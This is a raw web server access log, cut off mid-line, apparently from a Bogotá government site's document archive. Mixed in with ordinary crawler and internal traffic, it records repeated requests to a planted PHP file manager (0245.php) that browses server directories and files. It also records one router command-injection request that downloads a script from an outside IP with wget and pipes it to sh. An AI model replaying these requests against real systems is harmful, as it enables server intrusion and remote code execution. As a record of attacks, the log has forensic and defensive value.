201.245.192.253 - - [25/Jun/2024:07:58:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
201.245.192.253 - - [25/Jun/2024:07:58:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 15
201.245.192.253 - - [25/Jun/2024:07:58:59 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 124
201.245.192.253 - - [25/Jun/2024:07:58:59 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.45.11 - - [25/Jun/2024:07:58:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CEAAB%5C&f=VertimientosServiceService_schema1.xsd&ft=html&white=1 HTTP/1.1" 200 470
201.245.192.253 - - [25/Jun/2024:07:59:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [25/Jun/2024:07:59:04 -0500] "HEAD / HTTP/1.1" 200 -
47.128.30.120 - - [25/Jun/2024:07:59:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp%5C&f=head.php&ft=html&white=1 HTTP/1.1" 200 551
201.245.192.253 - - [25/Jun/2024:07:59:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.30.120 - - [25/Jun/2024:07:59:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/xampp.css HTTP/1.1" 404 1390
47.128.30.120 - - [25/Jun/2024:07:59:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/img/xampp-logo-new.gif HTTP/1.1" 404 1390
47.128.30.120 - - [25/Jun/2024:07:59:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/img/head-fuer.gif HTTP/1.1" 404 1390
47.128.30.120 - - [25/Jun/2024:07:59:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/img/head-windows.gif HTTP/1.1" 404 1390
216.244.66.195 - - [25/Jun/2024:07:59:18 -0500] "GET /BLA/resoluciones/AUTOS%202016/0810.pdf HTTP/1.1" 200 491093
47.128.30.120 - - [25/Jun/2024:07:59:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/img/head-for.gif HTTP/1.1" 404 1390
172.22.2.4 - - [25/Jun/2024:07:59:29 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
201.245.192.253 - - [25/Jun/2024:07:59:30 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
157.55.39.11 - - [25/Jun/2024:07:59:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7070.pdf HTTP/1.1" 304 -
66.249.66.19 - - [25/Jun/2024:07:59:31 -0500] "GET /BLA/resoluciones/AUTOS%202020/3598.pdf HTTP/1.1" 200 355198
47.128.17.106 - - [25/Jun/2024:07:59:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Caccesibilidad%5C&f=discapacidad.html&ft=code&white=1 HTTP/1.1" 200 1126
181.61.209.39 - - [25/Jun/2024:07:59:45 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 14105
181.61.209.39 - - [25/Jun/2024:07:59:50 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2012%2F HTTP/1.1" 200 277299
47.128.30.109 - - [25/Jun/2024:07:59:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5Cwebalizer&f=hourly_usage_201203.png&ft=info HTTP/1.1" 200 3800
47.128.30.109 - - [25/Jun/2024:07:59:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_png HTTP/1.1" 200 175
47.128.30.109 - - [25/Jun/2024:07:59:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.30.109 - - [25/Jun/2024:07:59:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.30.109 - - [25/Jun/2024:07:59:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.30.109 - - [25/Jun/2024:07:59:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.30.109 - - [25/Jun/2024:07:59:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.30.109 - - [25/Jun/2024:07:59:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.30.109 - - [25/Jun/2024:07:59:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.30.109 - - [25/Jun/2024:07:59:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.30.109 - - [25/Jun/2024:07:59:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
172.22.2.4 - - [25/Jun/2024:07:58:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [25/Jun/2024:08:00:06 -0500] "GET /BLA/resoluciones/AUTOS%202016/1047.pdf HTTP/1.1" 200 426844
201.245.192.253 - - [25/Jun/2024:08:00:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.16.95 - - [25/Jun/2024:08:00:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2019&sort=0a HTTP/1.1" 200 71477
172.22.2.4 - - [25/Jun/2024:07:59:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55442
47.128.127.253 - - [25/Jun/2024:08:00:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp%5C&f=iart.php&ft=html&white=1 HTTP/1.1" 200 1356
47.128.127.253 - - [25/Jun/2024:08:00:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/xampp.css HTTP/1.1" 404 1390
216.244.66.195 - - [25/Jun/2024:08:00:54 -0500] "GET /BLA/resoluciones/AUTOS%202016/1459.pdf HTTP/1.1" 200 389650
52.167.144.204 - - [25/Jun/2024:08:01:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3956.pdf HTTP/1.1" 304 -
47.128.59.111 - - [25/Jun/2024:08:01:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5579.pdf&ft=img HTTP/1.1" 200 15951
47.128.59.111 - - [25/Jun/2024:08:01:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.59.111 - - [25/Jun/2024:08:01:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.59.111 - - [25/Jun/2024:08:01:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.59.111 - - [25/Jun/2024:08:01:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.59.111 - - [25/Jun/2024:08:01:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.59.111 - - [25/Jun/2024:08:01:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.59.111 - - [25/Jun/2024:08:01:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.59.111 - - [25/Jun/2024:08:01:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.59.111 - - [25/Jun/2024:08:01:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.59.111 - - [25/Jun/2024:08:01:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
201.245.192.253 - - [25/Jun/2024:08:01:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [25/Jun/2024:08:01:30 -0500] "GET /BLA/resoluciones/AUTOS%202016/1503.pdf HTTP/1.1" 200 511036
47.128.59.147 - - [25/Jun/2024:08:01:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CAmbienteBogota%5Cautoliquidacion&f=formrespo.htm&ft=info HTTP/1.1" 200 3745
201.245.192.253 - - [25/Jun/2024:08:01:30 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.59.147 - - [25/Jun/2024:08:01:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.59.147 - - [25/Jun/2024:08:01:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.59.147 - - [25/Jun/2024:08:01:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.59.147 - - [25/Jun/2024:08:01:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.59.147 - - [25/Jun/2024:08:01:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.59.147 - - [25/Jun/2024:08:01:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.59.147 - - [25/Jun/2024:08:01:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.59.147 - - [25/Jun/2024:08:01:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
157.55.39.11 - - [25/Jun/2024:08:01:31 -0500] "GET /BLA/resoluciones/AUTOS%202013/0170.pdf HTTP/1.1" 200 3039441
47.128.59.147 - - [25/Jun/2024:08:01:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_htm HTTP/1.1" 200 79
47.128.59.147 - - [25/Jun/2024:08:01:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [25/Jun/2024:08:01:39 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
47.128.59.136 - - [25/Jun/2024:08:01:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=mce-view.min.js&ft=code&white=1 HTTP/1.1" 200 3344
216.244.66.195 - - [25/Jun/2024:08:02:13 -0500] "GET /BLA/resoluciones/AUTOS%202016/2016.pdf HTTP/1.1" 200 492903
47.128.124.4 - - [25/Jun/2024:08:02:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs%5C&f=theme.min.js&ft=img&white=1 HTTP/1.1" 200 21173
201.245.192.253 - - [25/Jun/2024:08:02:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
185.191.127.212 - - [25/Jun/2024:08:02:22 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
47.128.124.54 - - [25/Jun/2024:08:02:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Creq%5C&f=footer.php&ft=html&white=1 HTTP/1.1" 200 296
47.128.124.54 - - [25/Jun/2024:08:02:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/js/jquery.dataTables.min.js HTTP/1.1" 404 1390
47.128.124.54 - - [25/Jun/2024:08:02:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/js/jquery.min.js HTTP/1.1" 404 1390
47.128.124.54 - - [25/Jun/2024:08:02:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/js/dataTables.bootstrap.js HTTP/1.1" 404 1390
47.128.124.54 - - [25/Jun/2024:08:02:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/js/bootstrap.min.js HTTP/1.1" 404 1390
47.128.124.54 - - [25/Jun/2024:08:02:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/js/jquery.dataTables.min.js HTTP/1.1" 404 1390
47.128.124.54 - - [25/Jun/2024:08:02:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/js/dataTables.bootstrap.js HTTP/1.1" 404 1390
47.128.62.55 - - [25/Jun/2024:08:02:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=customize-loader.min.js&ft=code&white=1 HTTP/1.1" 200 1291
216.244.66.195 - - [25/Jun/2024:08:02:53 -0500] "GET /BLA/resoluciones/AUTOS%202016/2253.pdf HTTP/1.1" 200 516286
47.128.124.71 - - [25/Jun/2024:08:03:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5C&f=xampp_shell.bat&ft=html&white=1 HTTP/1.1" 200 436
201.245.192.253 - - [25/Jun/2024:08:03:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [25/Jun/2024:08:03:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.15.147.27 - - [25/Jun/2024:08:03:18 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Jun/2024:08:03:30 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [25/Jun/2024:08:03:35 -0500] "GET /BLA/resoluciones/AUTOS%202016/2386.pdf HTTP/1.1" 200 379877
47.128.122.92 - - [25/Jun/2024:08:03:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Creqs%5C&f=footer.php&ft=html&white=1 HTTP/1.1" 200 296
47.128.122.92 - - [25/Jun/2024:08:03:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/js/jquery.min.js HTTP/1.1" 404 1392
47.128.122.92 - - [25/Jun/2024:08:03:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/js/bootstrap.min.js HTTP/1.1" 404 1392
47.128.122.92 - - [25/Jun/2024:08:03:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/js/dataTables.bootstrap.js HTTP/1.1" 404 1392
47.128.122.92 - - [25/Jun/2024:08:03:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/js/jquery.dataTables.min.js HTTP/1.1" 404 1392
47.128.122.92 - - [25/Jun/2024:08:03:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/js/jquery.dataTables.min.js HTTP/1.1" 404 1392
47.128.122.92 - - [25/Jun/2024:08:03:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/js/dataTables.bootstrap.js HTTP/1.1" 404 1392
47.128.22.199 - - [25/Jun/2024:08:03:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2007&sort=2a HTTP/1.1" 200 141462
47.128.31.129 - - [25/Jun/2024:08:04:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=customize-base.min.js&ft=code&white=1 HTTP/1.1" 200 2187
216.245.221.92 - - [25/Jun/2024:08:04:04 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [25/Jun/2024:08:04:13 -0500] "GET /BLA/resoluciones/AUTOS%202016/2390.pdf HTTP/1.1" 200 507493
201.245.192.253 - - [25/Jun/2024:08:04:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.17.211 - - [25/Jun/2024:08:04:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=admin-footer.php&white=1 HTTP/1.1" 200 1350
66.249.66.20 - - [25/Jun/2024:08:04:32 -0500] "GET /BLA/resoluciones/AUTOS%202023/0233.pdf HTTP/1.1" 304 -
47.128.60.185 - - [25/Jun/2024:08:04:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CAmbienteBogota%5Ccounter%5C&f=phpinfo.php&ft=code&white=1 HTTP/1.1" 200 121
216.244.66.195 - - [25/Jun/2024:08:04:44 -0500] "GET /BLA/resoluciones/AUTOS%202016/2621.pdf HTTP/1.1" 200 360999
47.128.60.189 - - [25/Jun/2024:08:05:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Ctcpdf%5C&f=LICENSE.TXT&ft=code&white=1 HTTP/1.1" 200 16689
201.245.192.253 - - [25/Jun/2024:08:05:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [25/Jun/2024:08:05:22 -0500] "GET /BLA/resoluciones/AUTOS%202016/2679.pdf HTTP/1.1" 200 669637
186.102.25.192 - - [25/Jun/2024:08:05:28 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19wLDA0KPxmBwchNjVKdCDnyjmey50xTk5jf+pdTOgzD084zEAVPMxU&y=U2FsdGVkX18+P8PXLdtjEBnHqCKjafERSnWW8lix3Cg1De/maO1Dxba6uY+ngTZd HTTP/1.1" 200 30
186.102.25.192 - - [25/Jun/2024:08:05:28 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/0MeYjptELES3rmaPeFXGk84ZOMg5javd1zOEZGtfrgKyVvioiPYGdxliKKyN9DJG+wZhRpZinRenmagtgKn4RijcUroE9W2A=&u=U2FsdGVkX19r8tA2fpPgWgb8gN3ZSL0Hsq/TzpWsOJ0=&y=U2FsdGVkX18+P8PXLdtjEBnHqCKjafERSnWW8lix3Cg1De/maO1Dxba6uY+ngTZd HTTP/1.1" 200 70
186.102.25.192 - - [25/Jun/2024:08:05:28 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18CspXQZMhH7Pplt71YDKcEFU9lnmL0hYkHgB1kn7lkE2qsngrxN1ny9j8w30wQjisfb0xqa6ZBYToubgJoVyL/p22Kb19rAc8AhX1mjtAJwTYgJ0T1BfRsetc8NKv9Ww4NQ4E7DZFtuNSZQKmR3TWQAyJ9Xg6FDj5uJdQY+kSizxK+VqRWyIVhh2RE3BMf2mkE9OmWGGSMA6kidIHIGT6Rm88jDjpR1h+BV2JUSQaHTx4sOA746WNsOXbp8f2tuPlSSFThYSUiOjXRRw6Hi6Fpw5amuDsN1FB7ZjED1dop6VJgadkmoQaxKB7JzRtIYT4NaPIT1NcguLr+38RRUhX/ni+bn+Tn3orDfp7lcQ/mTpc46sapBiAUauF2A4TdmSxlM/Uz/D+4sQLHlAXzbibUFX5oZRWfTdVogjSG9CDbmdey+FoJ9ds/xRoqOm7tOlkSXQ5HhyoZVMLTc8CH235ZSv/qKBRckjRdh8YCks69+Q/uNStLkpDYwG29MMfufQyh+Z8hEHRMivfRO44DwPZJxAqbClNoHGe3A1Rfcdug86msKD2POiMNuAeE3ah483tp2KcekEogM6NjtgtxPnP+BX+60gvAor7OaQ5Wp9KvfzChq85Ix1bfP1uxYsqz7NBLyhjQkWy2odRj1Q1wwJOGpAr/JHuOLDDzDeKxPvGbj4A/6bvs9kT3CBYFLnBwhMt1a9fD8ODi7pih4uix2+r2asEcvTjbXyIObsLrJTjIaf/Ori7A8O61cprfQeCjpJbkxMPpaa/Pj1gawo4KHeH1pajRik65atnV2p20JglQAZ6LNtKSy0TCbsaVuFrz5M2edALUngxjGUsrx/rPgPR9v3FY/9nAEopGOIFj3fOoTAk6qjAVBODak2PI7NLVPP9vnIonCCVPlD16zhwExwYJbThNj+SHn4k9QueucQrdNfQomozm7vUG4bBQjqKWHTp/wnHe9TaaS4MVWhOMoRsPXW+rCG0nRBatMMssY/j+ftd4CqupW1bPrILIqqytJi24H1kyaZlL3aCOfPnzwDmNPwuO4L7ewhG/DAQBr/VlHmTjAXeNekWMnf687ubmHMqrkUoefqRuqumFSZAqFgvY5MfcgiieBEhWxwA9PpbZTO1aSQxzcoQXGHyI1S+VbLMVYuwPfcL47BNmccIf2HfYErJ0ioBhGGak6sUG38wS82Ect7pgVJUoRQ3ju+7/3spRLr02RdEiCkpDotEkjfTKhesL8rdhBbgcokpxegyvqgSCP2lrB9vdF/q9ZG1DtIe+ZoK3iqEdJR+mswy04ba4Ni55jc10IPLcU7XwOOZ/aJy0GBhd89r+5Nwi4IR6+N0tPDkSEgf5I2xPgT2M0ZRry51581Wpqm4/1l/EbYBTSDiNMVFPN5Ap9ohRBMaKnuWm5qBKoZCB0fuVL6d3whKZfQHHH+8v+mlZuVmILmIGJgO3nfyQAugFbvLlc+ZQYakqh6k9uxLdd/sdVtmJsYR1LFZ8QoaghWE65kJiKcZ3I60PfGO5tKY5M+rltaj2pOE2reyWIty5Kn85OvegySrAHmAGGNPzpO+haVQapuPbjJiVr/6ldH1JlB5gB2K2ckJonKtoG6uR3n451k8pvn1NDpdxMHffkr6tsQZxEcXLR+sFNzke8CbmX9Up/ihNx+YZlJ08I/yJp2pX3OdhkCmimBimSxI/l2ltVgEs/LUJjg0VX8WdnaZJobMHPT8xg0BqKKSigbULTy/AFgLCkyNvLr8BqV/3fso=&u=U2FsdGVkX19r8tA2fpPgWgb8gN3ZSL0Hsq/TzpWsOJ0=&y=U2FsdGVkX18+P8PXLdtjEBnHqCKjafERSnWW8lix3Cg1De/maO1Dxba6uY+ngTZd HTTP/1.1" 200 70
186.102.25.192 - - [25/Jun/2024:08:05:28 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19v2G0BwN4GTi9a7Pndj0SnrZf/va8eD1e3CWy/bRV3kbC9ykh3V02rr0iPjGtmqzWmh6xzgTwDTpnfy15ZMCzFv/Yg8ADHqZHOJLnd3jThqk4WErft2OK5ePrfbt5GkVKHz867SwIgQGtpMXYLaQHrLFF2eHD5cJIGoxFKwUnC6vC4D9v67qdL35CqgEnjCICU3Yv88bsdf7vx/M6TkrkqLAa3+/ukZXqSaSaGG+UBdt7suyob4cTU+8jR6QAa1yaMCYNz9II2Fg6HoHN3909ex8tAQHW35xjLrwZvlQEn9AruX6BQCcBDFXMzf/Z13sVcCq7yiGKJCqKqQ3jvLb10MxxfC8ucS1cvOcmJncx2vpbr8U4+YAKLhmjqrQZRtTmUjS8kucvMXZyRczvaXNpscicD/wC1RJnuh5ds1EtbKUyFwhQ13NV4XnfVC9ZmM2NlGh2HAF2T82HsLKvIF208luIxFJA66o5Be6wVtuC/HSPyWg8sydraacIhYP3uq8bzAJxlNXfYp+UiOzJoBEsNy8VDhU7psMUFm7v44iAyTYfYQyoHsyr3O697uOjNLVdibxOoav653mdrI0jjYJvI0HB19KAx0RAvXzO/hpFCcCZZaXHohp/2P3HYCmFo9xlH53/YTLoNsuVIMKH3KMcIySyIoIc6aLB099Ye+dLh4KJRQQBNuWiVobOB5mo50dDi3VBXHwCcrZ+JAMUCfNuHR9jy6knAIdtgcJMUYum0ygUEEQ42r29C&u=U2FsdGVkX19r8tA2fpPgWgb8gN3ZS